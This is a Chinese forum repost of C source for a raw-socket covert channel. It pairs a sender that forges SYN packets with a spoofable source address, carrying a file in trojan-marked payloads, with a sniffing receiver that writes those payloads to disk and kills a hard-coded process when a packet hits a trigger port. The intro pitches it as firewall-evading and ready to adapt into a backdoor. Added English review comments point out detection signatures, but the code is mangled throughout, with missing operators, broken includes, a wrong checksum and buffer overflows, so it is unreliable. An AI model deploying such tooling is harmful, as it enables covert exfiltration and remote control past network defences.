关于TCP/IP数据包的截取和分析(摘自安全焦点论坛,原作:ilsy)
通过发送tcp数据包来实现文件传送,可以穿透大部分防火墙,具体原理不再多说,请参看xfocus.chm
以下的程序只是一个DEMO,如果是大型服务器的话,你就自己优化吧,否则cpu占有率是很大的.你可以修改
成自己的后门协议,完成嗅探启动的功能,虽然网上也流传着嗅探启动的代码,但都是server端的,我把client端代码也公布,比较简单.
SERVER:
/*
Send File with Raw Sockets V 0.0.5
by wzt
*/
#include stdio.h>
#include unistd.h>
#include fcntl.h>
#include string.h>
#include sys/socket.h>
#include sys/types.h>
#include netinet/in.h>
/* Protocol constants for the sender ("SERVER") half of the covert channel. */
/* Size of the scratch buffer in which the whole IP+TCP frame is assembled. */
#define MAXSIZE 65535
/* Payload capacity of one trojan_packet; main() also reads the file in chunks of this size. */
#define DATASIZE 1024
/* Fixed TCP sequence number placed in every packet. A constant, never-changing
 * "ISN" on SYN segments is a strong on-wire signature for this channel. */
#define SEQ 12345
/* Fixed marker written at the start of the TCP payload; the receiver matches on it. */
#define TROJAN_ID 6789
/* Sizes of the hand-rolled headers defined below. */
#define IPLEN sizeof(struct iphdr)
#define TCPLEN sizeof(struct tcphdr)
/* NOTE(review): the operators between the terms of PACKLEN and TROJANLEN were
 * lost in extraction; as printed these macros do not parse. Both also refer to
 * the local variable `trojan` of tcpsend(), so they are only meaningful inside
 * that function, not as file-scope constants. */
#define PACKLEN sizeof(struct iphdr) sizeof(struct tcphdr) sizeof(unsigned int) sizeof(unsigned int) strlen(trojan.data)
#define PSELEN sizeof(struct psehdr)
#define TROJANLEN sizeof(unsigned int) sizeof(unsigned int) strlen(trojan.data)
/* Hand-rolled IPv4 header, 20 bytes with no options. The sender builds this
 * itself because the raw socket is opened with IP_HDRINCL; nothing in this
 * file validates it, so every field is whatever tcpsend() writes. */
struct iphdr
{
unsigned char h_verlen; /* version / header-length byte (name suggests version in the high nibble) */
unsigned char tos;
unsigned short total_len; /* total datagram length, network byte order */
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto; /* IPPROTO_TCP for every packet this program emits */
unsigned short checksum; /* left at 0 by tcpsend(); not computed in this file */
unsigned int sourceIP; /* as returned by inet_addr(), i.e. already network byte order */
unsigned int destIP;
};
/* Hand-rolled TCP header, 20 bytes with no options. Only th_seq, th_flag and
 * the ports carry meaning for this channel; everything else is constant. */
struct tcphdr{
unsigned short th_sport;
unsigned short th_dport;
unsigned int th_seq; /* always htonl(SEQ) on the wire - see tcpsend() */
unsigned int th_ack; /* always 0 */
unsigned char th_lenres; /* data offset plus reserved bits */
unsigned char th_flag; /* set to 2 (the SYN bit) by tcpsend(); the receiver matches on exactly that value */
unsigned short th_win; /* fixed 512 */
unsigned short th_sum; /* filled from in_cksum() over the pseudo-header + segment */
unsigned short th_urp;
};
/* TCP pseudo-header used only as checksum input (never sent).
 * NOTE(review): saddr/daddr are `unsigned long`, which is 8 bytes on LP64
 * targets; there sizeof(struct psehdr) is 24, not the 12 bytes the standard
 * pseudo-header occupies, so th_sum computed over it would not verify on a
 * 64-bit build - confirm against the intended ABI. */
struct psehdr{
unsigned long saddr;
unsigned long daddr;
unsigned char reserved;
unsigned char proto;
unsigned short len; /* TCP header + payload length, network byte order */
};
/* Application-layer payload carried after the TCP header (8 + DATASIZE bytes).
 * trojan_id is stored with htons() into a 4-byte field; datalen is stored in
 * host byte order (no htonl() in tcpsend()). Only the first TROJANLEN bytes of
 * the struct are copied into the outgoing frame. */
struct trojan_packet{
unsigned int trojan_id; /* TROJAN_ID, via htons() */
unsigned int datalen; /* strlen() of the chunk, host byte order */
char data[DATASIZE]; /* NUL-terminated copy of the chunk */
};
/* Forward declarations; definitions follow below. */
void usage(char *pro);
unsigned short in_cksum(unsigned short *addr,int len);
int tcpsend(char *src_ip,char *src_port,char *dst_ip,char *dst_port,char *data);
/* Print the program name and exit with status 0. The argument list the user
 * is expected to supply is not described; main() passes argv[1..5] as
 * src_ip src_port dst_ip dst_port file. The "/n" in the format string looks
 * like a mangled "\n". exit() is used although <stdlib.h> is not in the
 * include list above. */
void usage(char *pro)
{
fprintf(stdout,"%s /n",pro);
exit(0);
}
/* Internet (one's-complement) checksum over `len` bytes at `addr`, in the
 * usual 16-bit-word loop with a trailing odd byte.
 * NOTE(review): the arithmetic operators in the accumulation and folding
 * lines were lost in extraction (`sum = *w ;`, `sum = (...) (...)`), and the
 * function returns `value` - the odd-byte temporary - rather than the folded
 * sum. As printed this does not compute a checksum. u_short/u_char come from
 * <sys/types.h>. */
unsigned short in_cksum(unsigned short *addr,int len)
{
register int sum = 0;
register u_short *w = addr;
register int nleft = len;
u_short value =0;
/* consume whole 16-bit words */
while( nleft > 1 ){
sum = *w ;
nleft -= 2;
}
/* odd trailing byte, zero-padded into the low byte of `value` */
if( nleft == 1 ){
*(u_char *)(&value) = *(u_char *)w;
sum = value;
}
/* fold the carries back into 16 bits */
sum = ( sum >> 16 ) ( sum & 0xffff );
sum = ( sum >> 16 );
return value;
}
/* Build one IPv4/TCP SYN segment by hand and send it through a raw socket.
 *
 * src_ip, dst_ip   dotted-quad strings, passed to inet_addr() unchecked
 *                  (inet_addr/inet_ntoa are used without <arpa/inet.h>).
 * src_port, dst_port  decimal strings, passed to atoi() unchecked.
 * data             NUL-terminated chunk; strlen() decides how much is sent,
 *                  so an embedded NUL truncates the chunk.
 *
 * Declared int but contains no return statement, so the value is
 * indeterminate; main() ignores it. Calls exit(1) on socket(), setsockopt()
 * or sendto() failure, so a caller never sees an error return.
 *
 * Defender notes: the socket is SOCK_RAW with IP_HDRINCL, which on Linux
 * needs root / CAP_NET_RAW, so the sender runs privileged. Every header field
 * other than the addresses and ports is a constant (ident 13, TTL 255,
 * seq 12345, window 512, flags == SYN only, ack 0), which makes these
 * segments easy to fingerprint in capture. The source address is whatever the
 * caller supplies, i.e. trivially spoofable. */
int tcpsend(char *src_ip,char *src_port,char *dst_ip,char *dst_port,char *data)
{
struct iphdr ip;
struct tcphdr tcp;
struct psehdr pseuhdr;
struct trojan_packet trojan;
struct sockaddr_in remote;
char data_buf[MAXSIZE]; /* uninitialised; frame is assembled in place */
int sock_id;
int data_len;
int flag=1;
int s_len;
/* comparison operator lost in extraction on the next line */
if( ( sock_id = socket(AF_INET,SOCK_RAW,IPPROTO_TCP) ) -1 ){
perror("[-] socket");
exit(1);
}
/* IP_HDRINCL: the kernel sends our IP header as-is (comparison operator lost here too) */
if( setsockopt(sock_id,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)) 0 ){
perror("[-] setsockopt");
exit(1);
}
/* application payload: 16-bit marker stored in a 32-bit field, host-order length */
trojan.trojan_id = htons(TROJAN_ID);
data_len = strlen(data);
strcpy(trojan.data,data); /* unbounded copy; relies on main() keeping data < DATASIZE */
trojan.datalen = data_len;
/* IP header. NOTE(review): the shift in the next line was lost in extraction,
 * and the length is divided by sizeof(unsigned long) rather than 4 - on an
 * LP64 build that yields an IHL of 2, not 5, i.e. a malformed header. */
ip.h_verlen = ( 4 4 | sizeof(struct iphdr) / sizeof(unsigned long) );
ip.tos = 0;
ip.total_len = htons(PACKLEN);
ip.frag_and_flags = 0x40;
ip.ident = 13; /* fixed IP ID */
ip.ttl = 255;
ip.proto = IPPROTO_TCP;
ip.sourceIP = inet_addr(src_ip); /* no check for INADDR_NONE */
ip.destIP = inet_addr(dst_ip);
ip.checksum = 0; /* never computed in this file */
/* TCP header: a bare SYN with constant seq/window */
tcp.th_sport = htons(atoi(src_port));
tcp.th_dport = htons(atoi(dst_port));
tcp.th_seq = htonl(SEQ);
tcp.th_ack = htonl(0);
tcp.th_lenres= (sizeof(struct tcphdr) / 4 4 | 0 ); /* shift lost in extraction */
tcp.th_flag = 2; /* SYN */
tcp.th_win = htons(512);
tcp.th_sum = 0; /* must be zero while the checksum is computed */
tcp.th_urp = 0;
/* pseudo-header for the TCP checksum */
pseuhdr.saddr = ip.sourceIP;
pseuhdr.daddr = ip.destIP;
pseuhdr.reserved = 0 ;
pseuhdr.proto = ip.proto;
pseuhdr.len = htons( TCPLEN TROJANLEN ); /* '+' lost in extraction */
/* checksum input: pseudo-header, TCP header, then the trimmed payload
 * (offset additions lost in extraction on the following lines) */
memcpy(data_buf,&pseuhdr,PSELEN);
memcpy(data_buf PSELEN,&tcp,TCPLEN);
memcpy(data_buf PSELEN TCPLEN,&trojan,TROJANLEN);
/* NOTE(review): the length passed here appears to add data_len on top of
 * TROJANLEN, which already includes strlen(trojan.data); if so the checksum
 * covers data_len bytes of data_buf that were never written. */
tcp.th_sum = in_cksum( (unsigned short *)data_buf,( PSELEN TCPLEN TROJANLEN data_len ) );
/* now overwrite the scratch buffer with the real frame: IP, TCP, payload */
memcpy(data_buf,&ip,IPLEN);
memcpy(data_buf IPLEN,&tcp,TCPLEN);
memcpy(data_buf IPLEN TCPLEN,&trojan,TROJANLEN);
remote.sin_family = AF_INET;
remote.sin_port = tcp.th_dport;
remote.sin_addr.s_addr = ip.destIP;
/* comparison operator lost in extraction on the next line */
if( (s_len = sendto( sock_id,data_buf,PACKLEN,0,(struct sockaddr *)&remote,sizeof(struct sockaddr)) ) 0 ){
perror("[-] sendto");
exit(1);
}
printf("[ ] Packet Successfuly Sending %d size./n",s_len);
// printf("%s",trojan.data);
close(sock_id);
/* no return value - see header comment */
}
/* Entry point: read the file named by argv[5] in DATASIZE-byte chunks and
 * hand each chunk to tcpsend() with argv[1..4] as src_ip src_port dst_ip
 * dst_port. Chunks are NUL-terminated and then sent via strlen(), so binary
 * content is cut at the first zero byte.
 * NOTE(review): buffer has DATASIZE elements, and read() may return exactly
 * DATASIZE, in which case `buffer[n_char] = 0` writes one byte past the end.
 * The argc comparison operator was lost in extraction. */
int main(int argc,char **argv)
{
char buffer[DATASIZE] = {0};
char temp[DATASIZE]; /* unused */
int fd;
int fd1; /* unused */
int n_char;
if( argc 6 ) usage(argv[0]);
/* comparison operator lost in extraction on the next line */
if( (fd = open(argv[5],O_RDONLY)) 0 ){
perror("[-] open");
exit(1);
}
while( (n_char = read(fd,buffer,DATASIZE)) > 0 ){
buffer[n_char] = 0; /* out of bounds when n_char == DATASIZE */
tcpsend(argv[1],argv[2],argv[3],argv[4],buffer);
}
close(fd);
printf("[ ] Done./n");
return 0;
}
CLIENT:
/*
Recv File From Raw Sockets V 0.0.5
by wzt
*/
#include stdio.h>
#include sys/socket.h>
#include sys/types.h>
#include netinet/in.h>
#include signal.h>
/* Receiver ("CLIENT") constants. */
/* Enables the per-packet printf() diagnostics in wait_tcp_signal(). */
#define DEBUG
#define DATASIZE 1024
/* Must equal the sender's SEQ and TROJAN_ID: both are matched exactly, with
 * no authentication, so any host that can put a packet on the wire with these
 * constants is accepted as the sender. */
#define SEQ 12345
#define TROJAN_ID 6789
/* NOTE(review): operators between the terms were lost in extraction. */
#define PACKETLEN sizeof(struct iphdr) sizeof(struct tcphdr) sizeof(struct trojan_packet)
/* Kill switch: a TCP packet to this destination port makes the receiver
 * SIGKILL the hard-coded PID below (see wait_tcp_signal()). */
#define PORT 61
#define PID 14844
/* Same hand-rolled 20-byte IPv4 header as on the sender side. The receiver
 * overlays it on raw bytes read from the socket, so it silently assumes
 * every incoming packet has no IP options. */
struct iphdr
{
unsigned char h_verlen;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto; /* checked against IPPROTO_TCP before anything else */
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
};
/* Same hand-rolled 20-byte TCP header as on the sender side; th_dport,
 * th_seq and th_flag are the fields the receiver dispatches on. */
struct tcphdr{
unsigned short th_sport;
unsigned short th_dport; /* == PORT triggers the kill switch */
unsigned int th_seq; /* == SEQ (after ntohl) is part of the data trigger */
unsigned int th_ack;
unsigned char th_lenres;
unsigned char th_flag; /* must be exactly 2 (SYN only) for the data trigger */
unsigned short th_win;
unsigned short th_sum; /* never verified by the receiver */
unsigned short th_urp;
};
/* Application payload as laid out by the sender. datalen is taken from the
 * packet in host byte order and used unvalidated as a write length. */
struct trojan_packet{
unsigned int trojan_id;
unsigned int datalen;
char data[DATASIZE];
};
/* Overlay for a whole received frame: fixed IP header, fixed TCP header,
 * then the payload. Assumes no IP or TCP options precede the payload. */
struct tpacket{
struct iphdr ip;
struct tcphdr tcp;
struct trojan_packet trojan;
};
/* Forward declarations; definitions follow below. */
void usage(char *help);
void wait_tcp_signal(int fd);
/* Print a usage line with the program name and exit with status 0.
 * main() expects argv[1] to be the output file name. "/n" looks like a
 * mangled "\n"; exit() is used without <stdlib.h> in the include list. */
void usage(char *pro)
{
fprintf(stdout," usage : %s /n",pro);
exit(0);
}
/* Sniff every TCP packet delivered to a raw IPPROTO_TCP socket and act on two
 * triggers:
 *   - destination port == PORT: SIGKILL the hard-coded PID, then reopen the
 *     socket and keep listening;
 *   - seq == SEQ, flags == SYN, payload marker == TROJAN_ID: append
 *     `datalen` bytes of the payload to `fd`.
 * Never returns; exits on malloc()/socket() failure.
 *
 * fd  open, writable descriptor the received data is appended to.
 *
 * Defender notes: a raw socket on every TCP packet needs root / CAP_NET_RAW
 * on Linux, and open raw sockets are visible in /proc/net/raw. There is no
 * authentication on either trigger - anyone who can deliver a packet with
 * these constants can fire them. The diagnostic strings printed here
 * ("Waiting Signal", "Found PORT", "KILL Pid OK") are usable as static
 * indicators.
 *
 * NOTE(review): the buffer is malloc(PACKETLEN) bytes (three structs) but
 * read() is asked for sizeof(struct tpacket) plus DATASIZE - if the lost
 * operator is '+', a large packet overflows the heap buffer. datalen is also
 * never bounded against DATASIZE before the write(). */
void wait_tcp_signal(int fd)
{
struct tpacket *packet;
int sock_id;
int r_len;
packet = (struct tpacket *)malloc(PACKETLEN); /* malloc() without <stdlib.h> */
if( packet == NULL ){
printf("[-] malloc packet");
exit(1);
}
signal(SIGCHLD,SIG_IGN); /* no fork() in this file; purpose unclear */
while(1){
/* comparison operator lost in extraction on the next line */
if( (sock_id = socket(AF_INET,SOCK_RAW,IPPROTO_TCP)) 1 ){
perror("[-] socket");
exit(0);
}
printf("[ ] !!Waiting Signal!!./n");
while(1){
memset(packet,0,sizeof(struct tpacket));
/* read() result is not checked; operator between the size terms lost in extraction */
r_len = read(sock_id,packet,sizeof(struct tpacket) DATASIZE );
#ifdef DEBUG
printf("[ ] Recv a signal %d size/n",r_len);
#endif
if( packet->ip.proto == IPPROTO_TCP ){
/* kill switch: any TCP packet to PORT, regardless of source */
if( ntohs(packet->tcp.th_dport) == PORT ){
printf("[ ] !!!Found PORT./n");
kill(PID,SIGKILL);
printf("[ } KILL Pid OK./n");
break; /* leave the read loop; the socket is closed and reopened below */
}
/* data trigger: constant seq, SYN-only flags, payload marker */
if( ntohl(packet->tcp.th_seq) == SEQ && packet->tcp.th_flag == 2 && ntohs(packet->trojan.trojan_id) == TROJAN_ID ){
#ifdef DEBUG
printf("[ ] Start ================================================= [ ]/n");
printf("[ ] Trojan.Id : %d/n",ntohs(packet->trojan.trojan_id));
/* inet_ntoa() takes a struct in_addr, but an unsigned int is passed here and below */
printf("[ ] Source IP addr : %s/n",inet_ntoa(packet->ip.sourceIP));
printf("[ ] Source Port : %d/n",ntohs(packet->tcp.th_sport));
printf("[ ] Dest Port : %d/n",ntohs(packet->tcp.th_dport));
printf("[ ] Dest IP : %s/n",inet_ntoa(packet->ip.destIP));
printf("[ ] Data : %d/n",packet->trojan.datalen);
printf("[ ] End ================================================= [ ]/n");
#endif
/* datalen comes straight from the packet; values above DATASIZE read past the buffer */
write(fd,packet->trojan.data,packet->trojan.datalen );
}
}
}
close(sock_id);
}
}
/* Entry point: create (or truncate) the file named by argv[1] with mode 0777
 * and pass its descriptor to wait_tcp_signal(), which never returns, so the
 * close() and return below are unreachable in practice.
 * Note the parameter names __argc/__argv use a reserved (double-underscore)
 * identifier form; the comparison operator on the creat() line was lost in
 * extraction. */
int main(int __argc,char **__argv)
{
int fd;
if( __argc == 1 ) usage(__argv[0]);
/* output file is created world-readable/writable/executable */
if( (fd = creat(__argv[1],0777)) -1 ){
perror("[-] creat");
exit(1);
}
wait_tcp_signal(fd);
close(fd);
return 0;
}